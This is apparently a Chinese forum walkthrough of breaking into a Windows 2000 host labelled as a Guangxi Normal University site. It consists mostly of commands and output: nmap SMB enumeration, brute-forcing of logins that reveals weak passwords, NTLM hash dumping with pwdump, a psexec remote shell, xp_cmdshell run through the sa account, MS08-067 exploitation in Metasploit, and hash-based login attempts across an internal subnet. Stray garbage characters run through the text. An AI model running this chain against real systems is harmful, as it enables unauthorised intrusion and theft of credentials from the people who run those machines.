广西师范网站http://202.103.242.241/
: b% A* }& {$ B( ]) l% j5 L! z
9 a( ]4 S9 a$ I. h. ^3 j" ~root@bt:~# nmap -sS -sV 202.103.242.241) }& W! ^ v" Y6 N! r; C6 Q# K
, g0 T& D/ A3 n/ d4 W( P; g
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
4 C1 M2 H; r' ~$ o8 O7 h+ y8 G! d- s4 Y# B! }$ k
Nmap scan report for bogon (202.103.242.241)
; r. D% B; {( Q+ V7 w9 D2 [3 O/ M& [/ L6 B
Host is up (0.00048s latency).7 L; N& U! @& ^1 }2 z
$ h$ i) c) B. ?6 u, v8 v! g) T N
Not shown: 993 closed ports
' H3 M$ Z( y1 B9 {- K" O s" e9 r% I; n9 W
PORT STATE SERVICE VERSION
3 S5 W" o! c) D5 m a9 J8 r7 @. L) Z/ [3 Q0 g9 p% {& S
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)! e+ [. r/ I1 W
5 f+ ^+ |3 v$ [" s0 e139/tcp open netbios-ssn
! t4 Z: t! D( t) |: K
. ^& \! B/ d* f7 D- b8 t2 Y445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds" |. `- F' e' W
) R q5 d7 X5 v2 x4 D
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
5 t F( m( U. p& l; r! n
. t. s3 w" G. B/ [6 C- M1026/tcp open msrpc Microsoft Windows RPC- v9 `- [3 N/ a$ ~( O3 I
. x+ ?: G% G- `6 j4 E% D3372/tcp open msdtc?2 i" [$ Y9 ]4 i8 a9 D
# {2 r. P" R b
3389/tcp open ms-term-serv?
3 p: A& r* c8 B* V* @' n6 x7 S7 m- e" X
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :, z9 C$ D3 K2 \& z
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
5 {: @4 X/ B/ j: s) [2 k- G
6 s. i! e6 F3 N' v! [, F7 q5 PSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
' W0 H8 G% {9 ]6 N! h
1 S% F! q0 k z" f: j, eSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)9 j; M; H4 w _& F- I& B; Y
0 E- S/ B9 j% X, Z0 L7 q) z8 ^; c
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO; g& G) `, X7 D! V& g1 }0 Q4 Z
. Q( K0 q) F* G' w
SF:ptions,6,”hO\n\x000Z”);
$ e% a. I4 x y: M0 s- f2 J1 A9 j3 B
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
& o& j) M& u5 f6 _5 n
# `) m& Z2 b2 x" l& q7 KService Info: OS: Windows1 R: q3 m4 P4 m$ A
# I7 Y( [7 J4 u5 T4 {9 [3 x7 \Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
% A1 x- I& G0 Z I
5 _+ A5 A( o+ R6 \5 O/ l" m2 fNmap done: 1 IP address (1 host up) scanned in 79.12 seconds" J3 c' @+ ^# d K
2 _- a1 A+ H6 zroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本: }( R8 H+ I5 O; R! N3 w
8 p: X b _) f; A. j9 j-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
' L: o, F6 c1 e
" m" F1 W3 ~$ S0 g z- E2 X& f-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
4 _0 @$ P( N% ?4 q. W, N; {! S, P/ W, z. Y
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse& N$ `, x0 g- E9 y, A2 Q5 l
3 v, K. s7 x; b/ J1 o& ^+ K-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
$ f7 U5 D5 G) C/ D) ~
/ i3 a& @3 @: D; X/ n$ g7 g% x% s-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse. D. l( F# B/ B+ [. i' d
8 d: u7 h" s, q9 k6 l$ G+ \
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse* ?/ ~9 [4 S! I( B" J+ k4 S
+ h/ u2 j) ?- | C8 D6 V+ z- e-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
3 h# A/ f o4 q J6 J0 G
( W3 S9 Y/ U0 J; l5 q, \3 N-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse3 r( S0 U* p6 v5 k& f
6 J8 [& k# C/ e3 q& k7 j% E$ ^-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse, s2 T. b, e6 O; J0 ]
" |) F0 ?" s1 I6 I" Y7 u-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse8 {# x$ D4 D5 T1 x
9 ]$ }* G$ ^& ~6 e7 {1 I4 x7 Y
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
$ @: R; W) V7 M7 N# U
9 t5 m$ ]* V2 F. s3 h, N-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse- l: B/ R( _5 g* X# Y g8 `" b
4 e4 T5 U6 h$ V: U-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse$ G. d- I' H( I/ q
9 {" @8 P6 U3 n8 W1 n$ t-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
4 _$ E6 K s5 g6 F, d: {0 a9 k
& a7 ?# ~4 d% T, X-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse4 E, W0 X. o0 x% f S! x
$ t. h0 ]3 ~+ j2 v O" q
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 J7 C; r5 ~' K
: a( f2 P4 ]; ?: |' k//此乃使用脚本扫描远程机器所存在的账户名- a3 ]" j: s1 i( B6 g
4 h2 T9 Z% b" s. m' hStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST8 G) ?: r1 b. F. S( |9 |
5 Y. P7 n2 X8 w9 g' D2 X- g3 n
Nmap scan report for bogon (202.103.242.241)
: y5 ?% Y3 Y; U' \+ n$ C
, R O* x* |+ i) E& B$ O7 z O& XHost is up (0.00038s latency).
) m+ j: {% D! J; c; h2 ?. ^
# Q" v- f, a2 a$ I M; V+ KNot shown: 993 closed ports- y! H+ G- _6 @8 H" m0 p1 h9 d
' i, E: ?$ e5 K H7 y3 kPORT STATE SERVICE. E: E: j1 M' M& `2 _9 h
; q/ G% |2 W6 ?7 f135/tcp open msrpc
7 _& d( k. L0 Z ~8 n/ o" y h& v$ W5 ~% ~2 x
139/tcp open netbios-ssn
$ w* Y! y/ R3 K9 O1 S( p% ~& \4 ?/ _% Q
445/tcp open microsoft-ds
\$ C; I7 R% F1 t3 Z7 f: ^ c* W6 W/ i+ M3 U
1025/tcp open NFS-or-IIS' b$ \$ L/ K H7 C" n( m
3 r7 a4 m8 I% o3 t# B
1026/tcp open LSA-or-nterm
+ r7 _1 k- ^( |+ f: N8 m6 Q4 q ^4 I; d$ e# j, s
3372/tcp open msdtc: v" u8 ?8 u7 n0 m# Y( d7 [
- `# A( b% ]3 p5 U' c$ H2 H
3389/tcp open ms-term-serv
- ?4 {- N1 I a2 o
. _6 Z9 t! b2 j( l7 PMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
- I7 h. {$ h% u q& @' i, n: Q
6 q: ^" N7 I# O0 d& ?+ a& CHost script results:, E- O) _) Q, o g
5 u" F2 h: T& f( } T3 S5 c9 i| smb-enum-users:
) v. q/ J. u* q
' T9 X* M, Q# _1 H: v/ J|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果. A7 I" O8 @+ g2 r' ~! v0 N/ \* H
7 N, f7 N- z. y! l2 q K& BNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
; u f# b- B( G* A+ j @$ U6 z
" d- s1 X1 V1 ~& troot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 ; ?' Z% \8 U3 f" g8 f5 e
/ _, A+ A7 x& R- V( T$ B//查看共享2 x& m* I+ U/ l e( O
8 I: u, r! d7 x( ~6 r
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST0 |. g! g; D& ?9 N
! y" i! v! @9 ?2 u TNmap scan report for bogon (202.103.242.241)# u6 Z9 Z' v% T/ w9 L4 {- F
7 }* m7 z$ b F& Z& f; i6 [7 YHost is up (0.00035s latency).
3 D' C: c$ w* ?% d! F
" C* _7 \- w6 F1 X! }; JNot shown: 993 closed ports/ X5 D# X7 ?" V' X; Y
3 e" W3 Y Y& Z/ R5 x2 V* SPORT STATE SERVICE$ t) v [, Z% l) _
; d9 b$ {) ?2 {' ~ o _135/tcp open msrpc/ Q2 B7 ^+ Z) C
5 M; i& X* `" O0 o2 b# U0 w9 z
139/tcp open netbios-ssn9 }$ Q I, x9 T8 C- O5 [' O4 C+ S
* V& }! J/ b Z- j" ?- c: s( K4 S9 a
445/tcp open microsoft-ds
! \: T0 I$ d$ ]" x) d0 F. d }. x* ^: T
1025/tcp open NFS-or-IIS/ K+ g V- }% P% n( h
. y1 ^" T& R5 z
1026/tcp open LSA-or-nterm
6 n" P0 ^% N- ]- G: M6 V. H; t5 V. A
. ^ J1 V$ X9 t `* y) Q1 S3372/tcp open msdtc
/ q3 y' I' x1 h! n% r4 f" _ J& O$ Z
* P: p' G( K/ o2 D# Q$ B3389/tcp open ms-term-serv! a; Z2 q$ ]$ D8 _3 _6 {' [
, b1 w, c9 }, x+ P2 ^* F$ ~9 wMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
8 M) B) M5 m- y( H2 t& y; A
0 [4 m+ P# \* K/ I( b. I% {Host script results:
" f5 N1 E1 Q1 t: t# q1 a3 X2 ]9 Q* v7 V, f" J
| smb-enum-shares:
. ]7 J5 H# E) z: x
% ~8 L% i+ U" w8 U5 P| ADMIN$
" q9 _; Z# `4 t& A4 y$ [. q& t0 D0 x. T' b6 R2 x2 _
| Anonymous access: <none>1 S: a& P& f( U1 _6 `% {
3 k$ {/ A$ t1 s& s' S
| C$: W0 N) {( {4 I; f! U
+ @% _6 m' a, S8 @% W
| Anonymous access: <none>
( _! v' w: Q- _
7 W4 O- v! t4 Q2 X/ q8 h7 M| IPC$# X. e5 n+ i" W5 W; w, O" [
* y, F4 e4 u) q8 `|_ Anonymous access: READ$ W! b) A2 S1 {0 x/ {% o
8 ~/ n) o3 G/ H' b; P7 W% [Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
$ P1 ^ m$ [, Q% h( o
/ k4 k: U: |* H/ w4 Proot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
! L2 C3 `5 t& r2 m. x0 z- t9 z# p; L# `- Q+ @! S0 ?
//获取用户密码& v( n' S3 X* ?# [0 p2 @5 k+ `3 c
) V' i: u7 W' R. F! f) X% `+ y, a+ k
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
- o* e4 T& N- c% {1 E. Y1 b2 X- c5 e! T8 j1 a# S) |
Nmap scan report for bogon (202.103.242.2418)
0 N6 x; Q. J. o3 x) z* L( z0 q0 [
Host is up (0.00041s latency)., a9 f' s! B1 \$ ~6 Y7 o
9 N' o, G: f% U9 BNot shown: 993 closed ports8 P3 K7 c ~6 z, h5 b1 B
9 f5 N7 Y" a5 e; l1 {3 p& f" `
PORT STATE SERVICE
: A+ a/ z0 `/ J- F0 m u& {+ `9 d8 b) X0 ?* E9 d% c/ o+ z
135/tcp open msrpc
) I- a& i: D0 y9 `7 D [: |: C5 G# K) @8 U9 E, t; l( W1 @* R
139/tcp open netbios-ssn
, i1 J0 p: c N; O: n: n! `; H8 p# F" [; ^, q
445/tcp open microsoft-ds
1 h3 t+ `# h0 S: x. n5 ~1 g
" w- N! g! M9 s8 d# x1025/tcp open NFS-or-IIS
6 S* K! u' K, f* B
6 k( {3 X; l; S1026/tcp open LSA-or-nterm* h7 m" X0 \. B- i3 f& L
) o! r2 P6 _; g; m; T& M3372/tcp open msdtc/ L2 P b- H' g+ e: G# M' J* K
; w5 n6 q' \3 c3 E! v& n I
3389/tcp open ms-term-serv
) Y9 _. K w& A
) o& R( |8 T6 ~- ~MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)6 K, N" L% T; X7 K) ~6 L
3 h* n. {8 D/ t2 K$ g& {
Host script results:- v; ]; _; y4 \$ A
5 R: w. w0 ~' l
| smb-brute:5 I& w0 _$ Q8 Y
5 E/ s3 k3 m. W8 T3 ]5 L" K
administrator:<blank> => Login was successful% F- N' C( j9 l/ ~/ G" c
6 c- v8 O$ Z9 ^" }" f|_ test:123456 => Login was successful
' {4 T; k, a1 \* E2 [8 `; @; l
* W) t6 ^/ X" o0 a+ N rNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
2 y* O: e4 t8 l b' p# \0 C7 L+ V
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash. X5 i) _7 U' T( z' q. H
, H f$ d0 O- ~9 u6 T0 U( F
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
7 v! H, h/ o0 ?
1 ]+ f: B( K+ G$ {4 C+ wroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
- F/ R" X2 t3 ?
# R: f; [8 H" s9 U9 F; G1 sroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
( Z' S* X9 N/ R* e( Z
5 F$ }% } y1 d% t6 v. b( ]6 `& t* QStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST0 o9 Y% B# O" f U+ n/ p1 L3 V) {' j
- X/ l8 O8 P& `% N1 |+ F8 R: v
Nmap scan report for bogon (202.103.242.241)
6 K# J# E5 m6 R1 G: U
. q4 ?" O2 g2 I$ I% Z, w* }Host is up (0.0012s latency).
* V4 ?" {8 y& k; U
l$ q- O8 W' M8 w9 _1 IPORT STATE SERVICE
1 y' O. O! w# |5 W+ c' W) Y6 F4 Y% p: A0 ^( N' e, P
135/tcp open msrpc/ E: L3 @; k8 I
) S+ K5 f! s+ i! S" O g: o139/tcp open netbios-ssn
% E x5 u9 A, z/ a6 ?$ X
% @! W* p _* J445/tcp open microsoft-ds
0 U% V M# [+ r( o) f& _- e) Q* C3 u0 l. @( v Y
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)- S( G0 R3 I) ]9 B
; D, U4 v2 ]& |& ~2 {4 `8 g ]Host script results:
) L7 w5 G3 W, N' _5 t6 ?) ]" k! E* r9 C* k6 g
| smb-pwdump:2 d* Q* E: X {# j, A* o1 \
/ G2 Y* M% G6 k) B" p. z| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
7 d& [ d) y0 U, Z5 f) L ?# L
9 p# D' r$ \4 _7 L/ A, ~- c| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************" D; H @+ A+ ~# j! B$ Y( @$ a
1 y7 V! U5 `2 ~. k1 X0 q& ^| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4/ `1 |5 ]' ~% v1 n
: c6 e3 V( r Q* x* ? F# {* j, }
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2* e% ]9 u- s7 ~6 Q8 I
/ @$ E/ R2 g v% H: A0 x5 ?6 L
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
3 B$ o: `0 i/ W: p9 M& N& e s, r0 C J2 I
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
$ z" g3 s x6 e3 V; k
& U; y* c8 t* A# w$ ?-p 123456 -e cmd.exe" D2 @; x O' l6 L
7 J1 v* ~% X: I
PsExec v1.55 – Execute processes remotely Z, q7 c$ r3 S
4 G1 |. D- |4 r; Y! b, Y* T, V
Copyright (C) 2001-2004 Mark Russinovich3 V7 ^9 A; W+ k" e7 h" O; X
, V6 c8 X, E( j$ g: [8 h5 A
Sysinternals – www.sysinternals.com
. R/ y/ y/ ^( y$ T Y/ t: r: b
6 {7 R W+ p. g" b' x: D, XMicrosoft Windows 2000 [Version 5.00.2195]
& E; m1 m0 s8 `$ [# f* [4 l8 k9 ^0 F H0 h7 n0 W. ~3 ^# R
(C) 版权所有 1985-2000 Microsoft Corp.
6 y. E2 }6 D9 g; I8 Q" w% k, i- k8 C7 q0 z
C:\WINNT\system32>ipconfig
5 u- N$ \8 P0 A7 j* _+ u3 t. I% {. B% m# N+ f0 n2 P) {' i* W" Z
Windows 2000 IP Configuration- x3 B" H* f. l* `
" u; O( F% y& H/ i: T) X7 X
Ethernet adapter 本地连接:
3 I3 `9 ?: r# ]* P3 J) z g. [
* l3 |! O+ I0 r6 Q' \Connection-specific DNS Suffix . :
6 O+ e1 m( M2 J2 n4 V ^7 O6 `/ g
: m8 P7 l. y/ A5 O3 W) j! N0 QIP Address. . . . . . . . . . . . : 202.103.242.241( V2 P7 i+ Z$ }
! {8 c# N2 z* f% m# K0 Z# ^1 ~
Subnet Mask . . . . . . . . . . . : 255.255.255.0; o# j! d) y0 a
6 m) N$ ^2 D5 ^" y( E/ i/ ?
Default Gateway . . . . . . . . . : 202.103.1.1% c% ^ }1 m! p% W" H
6 L8 M7 {$ t, p; ?' p6 P1 Z
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令; Y& C& d' H' i5 M, C- h0 i
' r, ]4 U2 q- l3 P7 E5 m& Mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞; K- G. p* z* g! V, v
( r& q! M+ }! J8 G4 |: `
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
5 s! d+ k5 W$ \1 f- Y- R
- C7 P6 ]3 m$ ~( c2 |Nmap scan report for bogon (202.103.242.241)
# i2 R8 h; V- ]) b
3 }4 d N+ `3 H$ E& S" T; m& DHost is up (0.00046s latency).
: P% k5 |) G" f g1 D5 P9 Y0 x0 r8 i, i* y+ U6 D
Not shown: 993 closed ports
( n! x9 K w7 c$ e
- B F; M" C* |PORT STATE SERVICE
" ~* B, V9 i6 D8 M- X, m1 [: e) z2 B( N
135/tcp open msrpc( d: Y5 a% O- _- ?$ t* f. [6 t8 I
1 m4 X9 ^& o$ ?- I" j! D/ Y
139/tcp open netbios-ssn
( y' j. C6 J% x L$ K4 K$ s) o1 K P3 H" Q1 v
445/tcp open microsoft-ds3 D8 m/ R1 w$ H
+ @- E) ~$ V6 ^8 y
1025/tcp open NFS-or-IIS6 k; b0 K9 s0 h" s9 s
2 f; p6 Z& w* o* W- V( o7 f% E8 p1026/tcp open LSA-or-nterm
9 c3 a8 l( x( M. j0 k: f3 ~$ n R# _3 F7 U3 l
3372/tcp open msdtc! v1 v2 n6 F3 k; S( i8 Y" r* D5 G8 Q
2 B; H8 p' M$ |" A
3389/tcp open ms-term-serv
5 d% h8 C1 c7 I" @, [1 j8 L
' ~/ n6 {. t; i! k+ u. gMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)/ J2 j9 I& k2 k( n" l4 |+ [
: E$ J& r$ s( f, a4 @ `: `; K
Host script results:: w3 C( B3 ^/ n* y
) f. ?$ D3 Q! Y/ x; _| smb-check-vulns:
6 ^4 e0 @4 Q2 l9 m C
# p7 c4 N2 r+ O& W7 S. [4 ~|_ MS08-067: VULNERABLE
8 X5 U8 E, k: B C$ y0 Y: `; r( q( u# m+ S- n9 k' P/ R
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds$ I* N! @+ ~+ P: \
& i( y# G' T+ `* _+ troot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
/ f/ g5 d; u( Q! w4 ~2 t! L
7 ?8 O: @7 u$ c) smsf > search ms082 ]3 d; v1 y2 c0 y
: S; Q, P% J' A2 b% w( }
msf > use exploit/windows/smb/ms08_067_netapi
& H9 K( \ W$ `+ T
0 v9 A G: t) v: L; S6 e9 umsf exploit(ms08_067_netapi) > show options
% ?+ h! q1 C! M5 r+ j) D; q' s7 `. [3 b* @' L& Y
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
+ s9 L* |9 B1 X) U1 ^6 ~3 X! E
' X' L2 c& e, @5 m: E# Z2 y" s2 bmsf exploit(ms08_067_netapi) > show payloads2 X6 Z: v; p8 ]2 y" x/ O
2 R& k9 y. u$ {: m$ L
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
) u( D% B! E* p; ?
& R2 I4 ~7 ?3 `# d3 o" n& Omsf exploit(ms08_067_netapi) > exploit
2 Q# _ m$ Y Y7 [4 V6 ~9 R/ ?9 a8 x; X
meterpreter >) m9 Q; }3 m. c6 J/ } w
/ {& F& K, x; [" n1 PBackground session 2? [y/N] (ctrl+z)
" {/ |9 x. E' ^& V+ V
) N( J+ w- L3 T, {0 Z9 Y @" hmsf exploit(ms08_067_netapi) > sessions -l
# X! j( u* `1 k8 ?; u1 O6 r
( p7 m" K: |) v/ Mroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
! w- Z7 B$ g4 ` H2 _7 Q% F# s
8 t* f& D9 G2 G# A. L- ~3 k+ V) ~+ ktest
+ N1 w& u, |" n" D5 Y
1 x9 u2 ], g5 E6 H( Dadministrator
8 n+ C' S0 M$ \- ], y4 f" {2 {
+ ?- z, D* R6 O# v3 ]' h9 Groot@bt:/usr/local/share/nmap/scripts# vim password.txt! W; {7 C# c' [6 I
5 O- r3 ^! G% G5 U4 q7 R
44EFCE164AB921CAAAD3B435B51404EE! E+ m( T. \. k
5 R- U) }+ z. Mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
) j0 t% ~) {, }" K
5 K3 |- @" C e+ V5 S //利用用户名跟获取的hash尝试对整段内网进行登录( d% h6 o4 I& r
4 P* A' X4 K/ c0 u. P
Nmap scan report for 192.168.1.105
% h2 j/ ~6 _1 L5 I0 l5 w2 |: M7 e2 X7 q, ~6 |# N$ C! e7 d# N g) `6 W
Host is up (0.00088s latency).
8 e% O, s# Q* `& f/ B* n' c
{9 a3 E' I2 S1 ~ n& f* s/ ?- A/ hNot shown: 993 closed ports$ @: M7 D' M& T3 X. h8 d
! E9 L- k( |$ f: G/ j5 q( |" LPORT STATE SERVICE( v- [* m# @9 c8 x; U
' x0 E7 L+ N5 W8 h6 j8 p' ^& Y# V135/tcp open msrpc
g ^5 _# x( O% \0 M* u1 l$ P/ w m/ t/ [% c8 A
139/tcp open netbios-ssn
$ b$ r: c& T" G3 c) W" ~% u( T3 r- {; _- n6 o- l! T3 U6 D& P7 }
445/tcp open microsoft-ds
, C: V3 y- l+ n5 P2 W6 X* P$ L7 ?0 c9 y6 p; a4 I1 \
1025/tcp open NFS-or-IIS/ T/ H1 Y% q4 r0 z2 W. u
; ~: I% R: B) e& F6 G
1026/tcp open LSA-or-nterm+ V$ Q+ B2 ^5 H0 U$ W! |
+ I$ Z5 \# v8 }2 ?* V$ L3372/tcp open msdtc
$ t: v3 V4 D9 Z! p' J' l- B" U$ e& X
3389/tcp open ms-term-serv8 ~1 R {- m: r5 f ?4 @
. _3 @! v4 V f& L/ s
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)0 w3 B2 M. L) [; k# s
( Q( d9 W! U2 }1 |) `Host script results:( b# a1 H4 `4 C) a+ _; A- o4 a
9 `2 }1 z. S- M- [& I
| smb-brute:
5 q7 p% k$ \1 y o; c. E7 U' O/ Z. P# w+ `$ b
|_ administrator:<blank> => Login was successful- u9 ]/ H; D6 d, _& ?1 p3 P% m
# W+ V0 T; C+ S% n# ^ T# f* ^攻击成功,一个简单的msf+nmap攻击~~·& I. R+ B" t- l: D( Z1 T
6 P) y, V" r+ B6 N2 [6 m5 ]. l$ b* k: u |